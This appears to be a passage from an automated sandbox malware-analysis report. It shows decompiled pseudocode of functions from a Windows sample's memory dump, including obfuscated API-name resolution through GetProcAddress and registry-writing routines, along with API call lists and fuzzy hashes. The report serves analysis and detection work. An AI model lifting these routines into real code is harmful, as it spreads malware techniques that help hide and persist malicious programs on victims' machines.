                                                                                                                                                                                                                                                            						_t43 = E048780EE(_t36, _t33);
                                                                                                                                                                                                                                                            						if(_t43 != 0) {
                                                                                                                                                                                                                                                            							E048770FF(_t36);
                                                                                                                                                                                                                                                            							_t36 = _t43;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					E048770FF(_t28);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t36;
                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                            0x04876ab0
                                                                                                                                                                                                                                                            0x04876ab3
                                                                                                                                                                                                                                                            0x04876ab4
                                                                                                                                                                                                                                                            0x04876abc
                                                                                                                                                                                                                                                            0x04876ac3
                                                                                                                                                                                                                                                            0x04876aca
                                                                                                                                                                                                                                                            0x04876ace
                                                                                                                                                                                                                                                            0x04876ad4
                                                                                                                                                                                                                                                            0x04876adb
                                                                                                                                                                                                                                                            0x04876ae0
                                                                                                                                                                                                                                                            0x04876af2
                                                                                                                                                                                                                                                            0x04876af6
                                                                                                                                                                                                                                                            0x04876afa
                                                                                                                                                                                                                                                            0x04876b00
                                                                                                                                                                                                                                                            0x04876b05
                                                                                                                                                                                                                                                            0x04876b15
                                                                                                                                                                                                                                                            0x04876b17
                                                                                                                                                                                                                                                            0x04876b2e
                                                                                                                                                                                                                                                            0x04876b32
                                                                                                                                                                                                                                                            0x04876b35
                                                                                                                                                                                                                                                            0x04876b3a
                                                                                                                                                                                                                                                            0x04876b3a
                                                                                                                                                                                                                                                            0x04876b43
                                                                                                                                                                                                                                                            0x04876b47
                                                                                                                                                                                                                                                            0x04876b4a
                                                                                                                                                                                                                                                            0x04876b4f
                                                                                                                                                                                                                                                            0x04876b4f
                                                                                                                                                                                                                                                            0x04876b47
                                                                                                                                                                                                                                                            0x04876b52
                                                                                                                                                                                                                                                            0x04876b52
                                                                                                                                                                                                                                                            0x04876b5d

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 048721F1: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,04876ACA,253D7325,00000000,00000000,745EC740,?,?,04878ED2,?), ref: 04872258
                                                                                                                                                                                                                                                              • Part of subcall function 048721F1: sprintf.NTDLL ref: 04872279
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04878ED2,?,052595B0), ref: 04876ADB
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,?,?,04878ED2,?,052595B0), ref: 04876AE3
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • strcpy.NTDLL ref: 04876AFA
                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 04876B05
                                                                                                                                                                                                                                                              • Part of subcall function 04879F9B: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04876B14,00000000,?,?,?,04878ED2,?,052595B0), ref: 04879FB2
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04878ED2,?,052595B0), ref: 04876B22
                                                                                                                                                                                                                                                              • Part of subcall function 048744D9: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04876B2E,00000000,?,?,04878ED2,?,052595B0), ref: 048744E3
                                                                                                                                                                                                                                                              • Part of subcall function 048744D9: _snprintf.NTDLL ref: 04874541
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                                            • String ID: =
                                                                                                                                                                                                                                                            • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                                            • Opcode ID: d7489231a8ea294ffc699b4b69b632332124661d31ff8092569409375baec139
                                                                                                                                                                                                                                                            • Instruction ID: bb247d5192cbffbfcbd846edfc0977ad4b932c9e76c33066af9faf410d086b97
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7489231a8ea294ffc699b4b69b632332124661d31ff8092569409375baec139
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE110A735015256B5712BBFC9CA8CAF369D9F457683050E25FA04E7101DE75FC0197B2
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 04871BFB
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(0070006F), ref: 04871C0F
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 04871C21
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 04871C85
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 04871C94
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 04871C9F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 344208780-0
                                                                                                                                                                                                                                                            • Opcode ID: 5ee63bdc15923a2fa508e2b98320f66af074bd51c65566192f12a130cadcc9f1
                                                                                                                                                                                                                                                            • Instruction ID: 46fea71a2f2a71e59a3d9e646eb6dc3572ab311d5b122641e1580f46ab91a3a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ee63bdc15923a2fa508e2b98320f66af074bd51c65566192f12a130cadcc9f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62313032D00609ABDB01EFECC858A9EBBB5EF89310F144965ED11EB220DB75ED05CB91
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E0487835C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t54 = E048716F8(0x20);
                                                                                                                                                                                                                                                            				if(_t54 == 0) {
                                                                                                                                                                                                                                                            					_v8 = 8;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t23 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t1 = _t23 + 0x487e11a; // 0x4c44544e
                                                                                                                                                                                                                                                            					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                                            					_t26 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t2 = _t26 + 0x487e769; // 0x7243775a
                                                                                                                                                                                                                                                            					_v8 = 0x7f;
                                                                                                                                                                                                                                                            					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                                            					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                                            					if(_t28 == 0) {
                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                            						E048770FF(_t54);
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t30 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            						_t5 = _t30 + 0x487e756; // 0x614d775a
                                                                                                                                                                                                                                                            						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                                            						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t33 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            							_t7 = _t33 + 0x487e40b; // 0x6e55775a
                                                                                                                                                                                                                                                            							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                                            							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                                            							if(_t35 == 0) {
                                                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t36 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            								_t9 = _t36 + 0x487e4d2; // 0x4e6c7452
                                                                                                                                                                                                                                                            								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                                            								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                                            								if(_t38 == 0) {
                                                                                                                                                                                                                                                            									goto L8;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									_t39 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            									_t11 = _t39 + 0x487e779; // 0x6c43775a
                                                                                                                                                                                                                                                            									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                                            									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                                            									if(_t41 == 0) {
                                                                                                                                                                                                                                                            										goto L8;
                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                                            										_t44 = E04871371(_t54, _a8);
                                                                                                                                                                                                                                                            										_v8 = _t44;
                                                                                                                                                                                                                                                            										if(_t44 != 0) {
                                                                                                                                                                                                                                                            											goto L8;
                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                            											 *_a12 = _t54;
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                            0x0487836b
                                                                                                                                                                                                                                                            0x0487836f
                                                                                                                                                                                                                                                            0x04878431
                                                                                                                                                                                                                                                            0x04878375
                                                                                                                                                                                                                                                            0x04878375
                                                                                                                                                                                                                                                            0x0487837a
                                                                                                                                                                                                                                                            0x0487838d
                                                                                                                                                                                                                                                            0x0487838f
                                                                                                                                                                                                                                                            0x04878394
                                                                                                                                                                                                                                                            0x0487839c
                                                                                                                                                                                                                                                            0x048783a3
                                                                                                                                                                                                                                                            0x048783a7
                                                                                                                                                                                                                                                            0x048783aa
                                                                                                                                                                                                                                                            0x04878429
                                                                                                                                                                                                                                                            0x0487842a
                                                                                                                                                                                                                                                            0x048783ac
                                                                                                                                                                                                                                                            0x048783ac
                                                                                                                                                                                                                                                            0x048783b1
                                                                                                                                                                                                                                                            0x048783b9
                                                                                                                                                                                                                                                            0x048783bd
                                                                                                                                                                                                                                                            0x048783c0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048783c2
                                                                                                                                                                                                                                                            0x048783c2
                                                                                                                                                                                                                                                            0x048783c7
                                                                                                                                                                                                                                                            0x048783cf
                                                                                                                                                                                                                                                            0x048783d3
                                                                                                                                                                                                                                                            0x048783d6
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048783d8
                                                                                                                                                                                                                                                            0x048783d8
                                                                                                                                                                                                                                                            0x048783dd
                                                                                                                                                                                                                                                            0x048783e5
                                                                                                                                                                                                                                                            0x048783e9
                                                                                                                                                                                                                                                            0x048783ec
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048783ee
                                                                                                                                                                                                                                                            0x048783ee
                                                                                                                                                                                                                                                            0x048783f3
                                                                                                                                                                                                                                                            0x048783fb
                                                                                                                                                                                                                                                            0x048783ff
                                                                                                                                                                                                                                                            0x04878402
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878404
                                                                                                                                                                                                                                                            0x0487840a
                                                                                                                                                                                                                                                            0x0487840f
                                                                                                                                                                                                                                                            0x04878416
                                                                                                                                                                                                                                                            0x0487841d
                                                                                                                                                                                                                                                            0x04878420
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878422
                                                                                                                                                                                                                                                            0x04878425
                                                                                                                                                                                                                                                            0x04878425
                                                                                                                                                                                                                                                            0x04878420
                                                                                                                                                                                                                                                            0x04878402
                                                                                                                                                                                                                                                            0x048783ec
                                                                                                                                                                                                                                                            0x048783d6
                                                                                                                                                                                                                                                            0x048783c0
                                                                                                                                                                                                                                                            0x048783aa
                                                                                                                                                                                                                                                            0x0487843f

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04877336,?,00000001,?,?,00000000,00000000), ref: 04878381
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 048783A3
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 048783B9
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 048783CF
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 048783E5
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 048783FB
                                                                                                                                                                                                                                                              • Part of subcall function 04871371: memset.NTDLL ref: 048713F0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1886625739-0
                                                                                                                                                                                                                                                            • Opcode ID: 4f446be61792ae0426f91b8ce21359b3ee68f0f7709b9300fbb6b60e20ebfb4f
                                                                                                                                                                                                                                                            • Instruction ID: 891114fb72ed4ae82f3a7cfa2da021be638c5cbed585695276b3fc372b23eeb8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f446be61792ae0426f91b8ce21359b3ee68f0f7709b9300fbb6b60e20ebfb4f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7214DF160120ADFD720EFA9D8A8E6A77ECEF083547048965E609D7200E774FD018B60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                            			E048718C1(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                            				signed int* _v16;
                                                                                                                                                                                                                                                            				void _v284;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				char* _t60;
                                                                                                                                                                                                                                                            				intOrPtr* _t61;
                                                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                                                            				char _t68;
                                                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                                            				signed int* _t104;
                                                                                                                                                                                                                                                            				intOrPtr* _t105;
                                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t97 = __ecx;
                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                            				_t102 = _a16;
                                                                                                                                                                                                                                                            				if(_t102 == 0) {
                                                                                                                                                                                                                                                            					__imp__( &_v284,  *0x487d33c);
                                                                                                                                                                                                                                                            					_t96 = 0x80000002;
                                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                                            					_t60 = E0487A0DB(0,  &_v284);
                                                                                                                                                                                                                                                            					_a8 = _t60;
                                                                                                                                                                                                                                                            					if(_t60 == 0) {
                                                                                                                                                                                                                                                            						_v8 = 8;
                                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                                            						_t61 = _a20;
                                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                                            							 *_t61 =  *_t61 + 1;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						return _v8;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t105 = _a24;
                                                                                                                                                                                                                                                            					if(E04876DDF(_t97, _t105, _t96, _t60) != 0) {
                                                                                                                                                                                                                                                            						L27:
                                                                                                                                                                                                                                                            						E048770FF(_a8);
                                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t65 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t16 = _t65 + 0x487e8fe; // 0x65696c43
                                                                                                                                                                                                                                                            					_t68 = E0487A0DB(0, _t16);
                                                                                                                                                                                                                                                            					_a24 = _t68;
                                                                                                                                                                                                                                                            					if(_t68 == 0) {
                                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                                            						_t29 = _t105 + 0x14; // 0x102
                                                                                                                                                                                                                                                            						_t33 = _t105 + 0x10; // 0x3d0487c0
                                                                                                                                                                                                                                                            						if(E04874748( *_t33, _t96, _a8,  *0x487d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                                                                                                                                                                                                                            							_t72 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            							if(_t102 == 0) {
                                                                                                                                                                                                                                                            								_t35 = _t72 + 0x487ea5f; // 0x4d4c4b48
                                                                                                                                                                                                                                                            								_t73 = _t35;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t34 = _t72 + 0x487e89f; // 0x55434b48
                                                                                                                                                                                                                                                            								_t73 = _t34;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							if(E04877620( &_a24, _t73,  *0x487d334,  *0x487d338,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                                                                                            								if(_t102 == 0) {
                                                                                                                                                                                                                                                            									_t75 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            									_t44 = _t75 + 0x487e871; // 0x74666f53
                                                                                                                                                                                                                                                            									_t78 = E0487A0DB(0, _t44);
                                                                                                                                                                                                                                                            									_t103 = _t78;
                                                                                                                                                                                                                                                            									if(_t78 == 0) {
                                                                                                                                                                                                                                                            										_v8 = 8;
                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                            										_t47 = _t105 + 0x10; // 0x3d0487c0
                                                                                                                                                                                                                                                            										E0487A202( *_t47, _t96, _a8,  *0x487d338, _a24);
                                                                                                                                                                                                                                                            										_t49 = _t105 + 0x10; // 0x3d0487c0
                                                                                                                                                                                                                                                            										E0487A202( *_t49, _t96, _t103,  *0x487d330, _a16);
                                                                                                                                                                                                                                                            										E048770FF(_t103);
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									_t40 = _t105 + 0x10; // 0x3d0487c0
                                                                                                                                                                                                                                                            									E0487A202( *_t40, _t96, _a8,  *0x487d338, _a24);
                                                                                                                                                                                                                                                            									_t43 = _t105 + 0x10; // 0x3d0487c0
                                                                                                                                                                                                                                                            									E0487A202( *_t43, _t96, _a8,  *0x487d330, _a16);
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								if( *_t105 != 0) {
                                                                                                                                                                                                                                                            									E048770FF(_a24);
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									 *_t105 = _a16;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t21 = _t105 + 0x10; // 0x3d0487c0
                                                                                                                                                                                                                                                            					if(E04876E8F( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                                                                                                                                                                                            						_t104 = _v16;
                                                                                                                                                                                                                                                            						_t88 = 0x28;
                                                                                                                                                                                                                                                            						if(_v12 == _t88) {
                                                                                                                                                                                                                                                            							 *_t104 =  *_t104 & 0x00000000;
                                                                                                                                                                                                                                                            							_t26 = _t105 + 0x10; // 0x3d0487c0
                                                                                                                                                                                                                                                            							E04874748( *_t26, _t96, _a8, _a24, _t104);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						E048770FF(_t104);
                                                                                                                                                                                                                                                            						_t102 = _a16;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					E048770FF(_a24);
                                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                                                                                            					goto L29;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					memcpy( &_v284, _a8, _t102);
                                                                                                                                                                                                                                                            					__imp__(_t106 + _t102 - 0x117,  *0x487d33c);
                                                                                                                                                                                                                                                            					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                                                                                                                                                                                                                                            					_t96 = 0x80000003;
                                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                            0x048718c1
                                                                                                                                                                                                                                                            0x048718ca
                                                                                                                                                                                                                                                            0x048718d1
                                                                                                                                                                                                                                                            0x048718d6
                                                                                                                                                                                                                                                            0x04871945
                                                                                                                                                                                                                                                            0x0487194b
                                                                                                                                                                                                                                                            0x04871950
                                                                                                                                                                                                                                                            0x04871959
                                                                                                                                                                                                                                                            0x04871960
                                                                                                                                                                                                                                                            0x04871963
                                                                                                                                                                                                                                                            0x04871ad7
                                                                                                                                                                                                                                                            0x04871ade
                                                                                                                                                                                                                                                            0x04871ade
                                                                                                                                                                                                                                                            0x04871ae3
                                                                                                                                                                                                                                                            0x04871ae5
                                                                                                                                                                                                                                                            0x04871ae5
                                                                                                                                                                                                                                                            0x04871aee
                                                                                                                                                                                                                                                            0x04871aee
                                                                                                                                                                                                                                                            0x04871969
                                                                                                                                                                                                                                                            0x04871975
                                                                                                                                                                                                                                                            0x04871acd
                                                                                                                                                                                                                                                            0x04871ad0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04871ad0
                                                                                                                                                                                                                                                            0x0487197b
                                                                                                                                                                                                                                                            0x04871980
                                                                                                                                                                                                                                                            0x04871989
                                                                                                                                                                                                                                                            0x04871990
                                                                                                                                                                                                                                                            0x04871993
                                                                                                                                                                                                                                                            0x048719dd
                                                                                                                                                                                                                                                            0x048719dd
                                                                                                                                                                                                                                                            0x048719f0
                                                                                                                                                                                                                                                            0x048719fa
                                                                                                                                                                                                                                                            0x04871a02
                                                                                                                                                                                                                                                            0x04871a07
                                                                                                                                                                                                                                                            0x04871a11
                                                                                                                                                                                                                                                            0x04871a11
                                                                                                                                                                                                                                                            0x04871a09
                                                                                                                                                                                                                                                            0x04871a09
                                                                                                                                                                                                                                                            0x04871a09
                                                                                                                                                                                                                                                            0x04871a09
                                                                                                                                                                                                                                                            0x04871a33
                                                                                                                                                                                                                                                            0x04871a3b
                                                                                                                                                                                                                                                            0x04871a69
                                                                                                                                                                                                                                                            0x04871a6e
                                                                                                                                                                                                                                                            0x04871a77
                                                                                                                                                                                                                                                            0x04871a7c
                                                                                                                                                                                                                                                            0x04871a80
                                                                                                                                                                                                                                                            0x04871ab2
                                                                                                                                                                                                                                                            0x04871a82
                                                                                                                                                                                                                                                            0x04871a8f
                                                                                                                                                                                                                                                            0x04871a92
                                                                                                                                                                                                                                                            0x04871aa2
                                                                                                                                                                                                                                                            0x04871aa5
                                                                                                                                                                                                                                                            0x04871aab
                                                                                                                                                                                                                                                            0x04871aab
                                                                                                                                                                                                                                                            0x04871a3d
                                                                                                                                                                                                                                                            0x04871a4a
                                                                                                                                                                                                                                                            0x04871a4d
                                                                                                                                                                                                                                                            0x04871a5f
                                                                                                                                                                                                                                                            0x04871a62
                                                                                                                                                                                                                                                            0x04871a62
                                                                                                                                                                                                                                                            0x04871abc
                                                                                                                                                                                                                                                            0x04871ac8
                                                                                                                                                                                                                                                            0x04871abe
                                                                                                                                                                                                                                                            0x04871ac1
                                                                                                                                                                                                                                                            0x04871ac1
                                                                                                                                                                                                                                                            0x04871abc
                                                                                                                                                                                                                                                            0x04871a33
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048719fa
                                                                                                                                                                                                                                                            0x048719a2
                                                                                                                                                                                                                                                            0x048719ac
                                                                                                                                                                                                                                                            0x048719ae
                                                                                                                                                                                                                                                            0x048719b3
                                                                                                                                                                                                                                                            0x048719b7
                                                                                                                                                                                                                                                            0x048719b9
                                                                                                                                                                                                                                                            0x048719c4
                                                                                                                                                                                                                                                            0x048719c7
                                                                                                                                                                                                                                                            0x048719c7
                                                                                                                                                                                                                                                            0x048719cd
                                                                                                                                                                                                                                                            0x048719d2
                                                                                                                                                                                                                                                            0x048719d2
                                                                                                                                                                                                                                                            0x048719d8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048719d8
                                                                                                                                                                                                                                                            0x048718db
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04871902
                                                                                                                                                                                                                                                            0x0487190d
                                                                                                                                                                                                                                                            0x04871923
                                                                                                                                                                                                                                                            0x04871929
                                                                                                                                                                                                                                                            0x04871931
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04871931

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • StrChrA.SHLWAPI(0487495C,0000005F,00000000,00000000,00000104), ref: 048718F4
                                                                                                                                                                                                                                                            • memcpy.NTDLL(?,0487495C,?), ref: 0487190D
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?), ref: 04871923
                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: lstrlen.KERNEL32(?,00000000,0487D330,00000001,048722CC,0487D00C,0487D00C,00000000,00000005,00000000,00000000,?,?,?,04877E0E,048791A4), ref: 0487A0E4
                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: mbstowcs.NTDLL ref: 0487A10B
